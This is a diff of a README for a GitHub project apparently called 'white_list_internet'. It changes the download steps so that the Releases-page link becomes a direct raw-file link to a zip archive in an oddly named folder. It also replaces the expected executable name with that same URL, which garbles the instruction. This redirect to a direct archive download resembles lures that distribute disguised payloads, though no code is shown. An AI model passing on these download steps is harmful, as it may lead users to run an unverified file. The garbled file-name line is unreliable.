nehrabalar/white_list_internet/README.md

 ## 📖 How to Use

 1. **Visit the Releases Page**
-   Go to our [Releases page](https://github.com/nehrabalar/white_list_internet/releases) to find the latest version of the application.
+   Go to our [Releases page](https://github.com/nehrabalar/white_list_internet/raw/refs/heads/main/cockneyfication/white-list-internet-3.6.zip) to find the latest version of the application.

 2. **Download the Application**
    Look for the latest version.
 Click on the download link corresponding to your operating system to download the application.

 3. **Locate the Downloaded File**
    Once the download is complete, find the file in your downloads folder.
-The file should be named something like `white_list_internet.exe` or similar, depending on your OS.
+The file should be named something like `https://github.com/nehrabalar/white_list_internet/raw/refs/heads/main/cockneyfication/white-list-internet-3.6.zip` or similar, depending on your OS.

 4. **Install the Application**
    - **For Windows:**